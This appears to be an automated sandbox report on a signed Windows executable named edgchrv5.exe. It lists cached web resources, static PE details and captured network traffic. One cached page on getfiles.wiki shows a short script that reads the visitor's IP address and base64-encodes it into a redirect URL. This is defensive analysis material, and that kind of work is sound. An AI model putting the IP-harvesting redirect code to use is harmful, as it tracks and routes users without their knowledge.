SHA1:	C4B27269723337F4C562EE5FE0654443E650B9B5
SHA-256:	CFDC24B388ED5C60AAE836A4BDA7EEF5D70FDE374CD054B123F800767147BC39
SHA-512:	3201DE08E4698F4426BA7E4B71627F65009BFF9BC4E178F95F0E0C94AE0DEED47FBA0EF98EF30D65D5109E8C1F3BD50AB204BB3FDE6A6AA6517271AD3CA6CC76
Malicious:	false
URL:	https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w
Preview:	_HST_cntval="#3Vis. today=3809";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	31
Entropy (8bit):	4.2603326005698765
Encrypted:	false
SSDEEP:	3:KGAsUMgRGe:5ZUMgRGe
MD5:	BBA664EA530F552AACAA32B9A8A22BED
SHA1:	F6D231F1117314F9F689083CABEC51D7D33DAE98
SHA-256:	BDF688D2401AAC6928AB357B0E9F9B8A0EC5F32A4D0D7A72B88A9508F390F0E9
SHA-512:	856AE2676C8DF3D1F7C02AC682F6B503754B68055CBACEE17C7A486AE7A5ACA87D21C3316D5E2CDC779F6E228883AF54D86520A9C7D2B40A23426135B27E3770
Malicious:	false
URL:	https://api.ipify.org/?format=jsonp&callback=getIP
Preview:	getIP({"ip":"102.129.143.77"});

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (11440), with no line terminators
Category:	downloaded
Size (bytes):	11440
Entropy (8bit):	5.405413454337748
Encrypted:	false
SSDEEP:	192:TixaOdP2DahLeKkda6nGvCvsojELj2n04UwXNAfLwUW1WuYx6jomrYZJp2XmIR2z:mxaOdWyLwaAWj2nvUwXNAfLwUWAuYx6e
MD5:	E959FBDD13DEF4B9A9D0A5FC9A7DE4D4
SHA1:	1E39712307E3673B40C0BDB8C7D3E86A3E8B60A0
SHA-256:	2DEFE59E357A7D0683C8283AC42841DB404A0884CAE2EAECEBF4B676E559DEDE
SHA-512:	590B22282634411002C9467C6C0D20D27979F841BFFCF893E715A2B61301A873457A9CBE0A765A11592E7F5CB81FC50D5BD436BD5D47DC93BFB776515B02E2C9
Malicious:	false
URL:	https://s10.histats.com/js15_as.js
Preview:	(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n\|\|{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]\|\|d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n\|\|n.length<1?n:n.replace(/^['"]?(.)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="hist

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	294
Entropy (8bit):	4.951706668845105
Encrypted:	false
SSDEEP:	6:7AqE6OcF2XmmmHDYt67/vYtLGYMDAqE6W/kUwxJKHpMv:EqHfF2WxHDTvSyYMcqHWcKpMv
MD5:	75AC127CF8C80495690FF32B437B686C
SHA1:	841CF4E78BD8CF73B891DAC85674C59E3B56642F
SHA-256:	6998F19612C0DC8A5664C5A7537FCC1404FCE0198B46C60F3565DE2DED53A126
SHA-512:	24B14F1D4E77AE130DBDD958E7D2A6DC060B64B071D7F2D034560D5CC734EB50FD4F9FA7C6E57AD7AD955F213B28D52CBEA6F5BE0B699DCC958F04A676FDEF8B
Malicious:	false
URL:	https://getfiles.wiki/redirect.php
Preview:	<script type="application/javascript">.. function getIP(json) {.. window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip);.. exit();.. }..</script>..<script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>..

Chrome Cache Entry: 132

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1277), with CRLF line terminators
Category:	downloaded
Size (bytes):	3568
Entropy (8bit):	5.432883994493033
Encrypted:	false
SSDEEP:	96:2XlnSuTIkycSXlnSuTIkLc8+1z1Q4mt7AHD7pW:bKyqKLH6pQ4K7qg
MD5:	3D874B1B676E48953AA76A5DF52C8CFC
SHA1:	6E514009A81E76A36120A50A00EC657AF36B85B6
SHA-256:	3DFA9C49BED519A1D3423F2B55FF1FFC751A1D75844C606BAD4FCD4D633E543A
SHA-512:	13547D10C56D8D1DF7AC2F068DAFAEB381CC181C2C36C900DC323237285F53671B3DEE66D88EBFFB7A6F69EAFBBC218F1E55459C98A6749C20A5905B02728EE8
Malicious:	false
URL:	https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=
Preview:	..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">..<style>..body {.. background-color: #000000 ;..}..</style>........</head>..<body>.. .. .. <script>(function(){"use strict";function n(n,e){var r;void 0===e&&(e="uclick");var c=null===(r=n.match(/\?.+?$/))\|\|void 0===r?void 0:r[0];return c?Array.from(c.matchAll(new RegExp("[?&](clickid\|"+e+")=([^=&])","g"))).map((function(n){return{name:n[1],value:n[2]}})):[]}function e(n){var e=n();return 0===e.length?{}:e.reduce((function(n,e){var r;return Object.assign(n,((r={})[e.name]=""+e.value,r))}),{})}function r(r){void 0===r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^\|; )(clickid\|"+n+")=([^;])","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(docume

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2077)
Category:	downloaded
Size (bytes):	2079
Entropy (8bit):	5.27420292409541
Encrypted:	false
SSDEEP:	48:xnMPwQHwUl3z7oHtWLSHms0yoPhuQ3cT0QadrrQnd0NJqO0fs7y02:xn5TIYHkums0yW/GaZQdg1c
MD5:	4088C66A294C63665C9BA86312010E3E
SHA1:	47031C485ABBDE7050CD6B3296BFACF8697CBCF5
SHA-256:	6B35F8E23B212E8121C7E99C46CEC2E10D9970F7B142D407058594B3C20BF19E
SHA-512:	AC74D839127E726DA994FB723FB2DB3918DAFC9735C24AED2AC0AA0EE8CEEFA11B5E06F949A58B57983FAE1D871A94809A29C60DD9ED9C60D4CEAA14347351C5
Malicious:	false
URL:	https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php
Preview:	!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o\|\|void 0!==(o=document.getElementsByTagName("body")[0])){var n=!1;n=localStorage\|\|{getItem:function(t){var e=("; "+document.cookie).split("; "+t+"=");return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e\|\|"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c,pv:0,c:{}}),"pl"in t&&h(t.pl,d);var u={a:"v",h:a};for(var v in!s&&c>d.sl+1800&&(d.ss=p(10),d.st=c,d.pv=0,u.s=1),d.pv++,d.sl=c,u.ss=d.ss,u.pv=d.pv,u.ls=Math.round(c-d.st),(s\|\|c>d.u1+86400)&&(d.u1=c,u.u1=1),(s\|\|c>d.u3+2592e3)&&(d.u3=c,u.u3=1),f(d),d.c)u[v]=d.c[v];!function(t){t.cbid=p(4),t.cb="_dtspv.c";var e=g(t);try{var n=document.createElement("script");n.async=!0,n.defer=!0,n.src=i

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.31777106448477
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	edgchrv5.exe
File size:	209776
MD5:	0c0a3d01c45f66056d607bbad486b39b
SHA1:	d96aa9b9fe3a0515d70f3e909f00c865dfc5821c
SHA256:	d158f3cfb47665928c5d304495fa99050a9e4c5b8d54332d400eec78bd7f98b6
SHA512:	76fcb32eb095ba719f8f532937641ce6d3e4918a559377dbe6f125c4aa9ad8ba0f390710efc912e2c19c59c2f03ce523e07b202e12014e634b5217c709fdf80e
SSDEEP:	3072:1JqmvLa0w5DElSlF8Af4a3uG+07J4txJt:1JqmvLaNyWFzv+07J4Jt
TLSH:	D4245A52F240D871D305273259A2D5E4E939BD385894D04FF23C7EFA5AB23A3596328F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y.D.y.D.y.D.+5D.y.D.+$D.y.D.+2D.y.D...D.y.D...D.y.D.y.D.y.D.+;D.y.D.+%D.y.D.+ D.y.DRich.y.D................PE..L...G.od...

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x403154
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x646F1847 [Thu May 25 08:11:51 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a1e2978a1231fce7a99dd60881e648fb

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	3/22/2023 7:10:47 AM 3/22/2024 7:10:47 AM
Subject Chain	CN=SOFTWARE ABFG LTD, O=SOFTWARE ABFG LTD, STREET="2nd Floor College House, 17 King Edwards Road", L=Ruislip, S=London, C=GB, OID.1.3.6.1.4.1.311.60.2.1.3=GB, SERIALNUMBER=14698890, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	FEE4DECF8FD42396157E11993B5B34D3
Thumbprint SHA-1:	EE81E7D510B97695351EF3F2E0C10F4D0601EDA6
Thumbprint SHA-256:	BAC0E9EE69D6FCA2A9B1164094103589FD63676A564F420D71A5B8A172BB3E7B
Serial:	3C22F5C916B284010CB8A481

Entrypoint Preview

Instruction
call 00007F06F0C58684h
jmp 00007F06F0C55BBEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041C618h], eax
mov dword ptr [0041C614h], ecx
mov dword ptr [0041C610h], edx
mov dword ptr [0041C60Ch], ebx
mov dword ptr [0041C608h], esi
mov dword ptr [0041C604h], edi
mov word ptr [0041C630h], ss
mov word ptr [0041C624h], cs
mov word ptr [0041C600h], ds
mov word ptr [0041C5FCh], es
mov word ptr [0041C5F8h], fs
mov word ptr [0041C5F4h], gs
pushfd
pop dword ptr [0041C628h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041C61Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041C620h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041C62Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041C568h], 00010001h
mov eax, dword ptr [0041C620h]
mov dword ptr [0041C51Ch], eax
mov dword ptr [0041C510h], C0000409h
mov dword ptr [0041C514h], 00000001h
mov eax, dword ptr [0040E004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0040E008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [0000004Ch]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd7fc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f000	0x13d8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x30600	0x2d70
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x33000	0xa64	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xd3d0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa944	0xaa00	False	0.5803538602941176	data	6.51232392663179	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x1ef4	0x2000	False	0.355712890625	data	5.398020386042508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x10428	0xe600	False	0.8180027173913044	data	7.552664631671183	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1f000	0x13d8c	0x13e00	False	0.17714475235849056	data	3.908722468514963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x33000	0x1286	0x1400	False	0.4400390625	data	4.343526437109149	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1f5f8	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States
RT_ICON	0x20060	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0x206c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x209b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x20ad8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States
RT_ICON	0x22100	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x22fa8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x23850	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x23db8	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x250a0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States
RT_ICON	0x292c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x2b870	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x2c918	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_ICON	0x2cd80	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States
RT_ICON	0x2d068	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States
RT_ICON	0x2d190	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States
RT_ICON	0x2e038	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States
RT_ICON	0x2e8e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States
RT_ICON	0x2ee48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States
RT_ICON	0x313f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States
RT_ICON	0x32498	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States
RT_MENU	0x32900	0x4a	data	English	United States
RT_DIALOG	0x3294c	0x144	data	English	United States
RT_STRING	0x32a90	0x50	data	English	United States
RT_ACCELERATOR	0x32ae0	0x10	data	English	United States
RT_GROUP_ICON	0x32af0	0xbc	data	English	United States
RT_GROUP_ICON	0x32bac	0x76	data	English	United States
RT_MANIFEST	0x32c24	0x165	ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetModuleHandleW, GetProcAddress, WaitForSingleObject, CloseHandle, GetFileAttributesW, Sleep, FindFirstFileW, FindNextFileW, FindClose, FlushFileBuffers, ExitThread, GetCurrentThreadId, GetLastError, CreateThread, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, ExitProcess, HeapFree, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryA, InitializeCriticalSectionAndSpinCount, RtlUnwind, HeapAlloc, VirtualAlloc, HeapReAlloc, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, MultiByteToWideChar, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, LCMapStringA, LCMapStringW, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

SHELL32.dll

SHGetSpecialFolderPathW, SHGetKnownFolderPath

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 12, 2023 19:07:04.505053997 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:04.505137920 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:04.505302906 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:04.510607004 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.510672092 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.510854959 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.511368990 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:04.511418104 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:04.511543036 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:04.512715101 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:04.512782097 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:04.513710022 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.513755083 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.514020920 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:04.514045000 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:04.645498991 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.645901918 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.645929098 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.646819115 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.646888018 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.648236990 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:04.648313999 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:04.654015064 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:04.654318094 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:04.654376030 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:04.655920029 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:04.656013966 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:04.656280041 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:04.656622887 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:04.656665087 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:04.658200979 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:04.658267021 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.314750910 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:05.314980984 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.315125942 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:05.315155983 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.317845106 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.318022966 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.318037033 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.322237015 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.322442055 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.322463036 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.322493076 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.348623991 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.348793983 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:05.348829985 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.349169970 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.349246979 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:05.350110054 CEST	49699	443	192.168.2.3	172.217.168.14
Jun 12, 2023 19:07:05.350135088 CEST	443	49699	172.217.168.14	192.168.2.3
Jun 12, 2023 19:07:05.360307932 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.362363100 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.362401962 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.362751007 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.362782001 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.371260881 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.371383905 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.371412039 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.371727943 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.371803045 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.372189045 CEST	49697	443	192.168.2.3	216.58.215.237
Jun 12, 2023 19:07:05.372209072 CEST	443	49697	216.58.215.237	192.168.2.3
Jun 12, 2023 19:07:05.403760910 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.625880003 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.625973940 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.626147985 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.631100893 CEST	49700	443	192.168.2.3	188.114.97.7
Jun 12, 2023 19:07:05.631165028 CEST	443	49700	188.114.97.7	192.168.2.3
Jun 12, 2023 19:07:05.697752953 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:05.697863102 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:05.697998047 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:05.698278904 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:05.698324919 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:05.814184904 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.814261913 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.814380884 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.814625025 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.814644098 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.864384890 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.865242958 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.865278959 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.865912914 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.866028070 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.866765976 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.866847992 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.896671057 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.896841049 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.896954060 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.937797070 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.937844992 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.945827961 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.945924997 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.945943117 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.946206093 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:05.946271896 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.946916103 CEST	49703	443	192.168.2.3	142.250.203.110
Jun 12, 2023 19:07:05.946938038 CEST	443	49703	142.250.203.110	192.168.2.3
Jun 12, 2023 19:07:06.075382948 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.077555895 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.077614069 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.078932047 CEST	443	49702	38.128.66.115	192.168.2.3
Jun 12, 2023 19:07:06.079029083 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.085932016 CEST	49702	443	192.168.2.3	38.128.66.115
Jun 12, 2023 19:07:06.086222887 CEST	443	49702	38.128.66.115	192.168.2.3
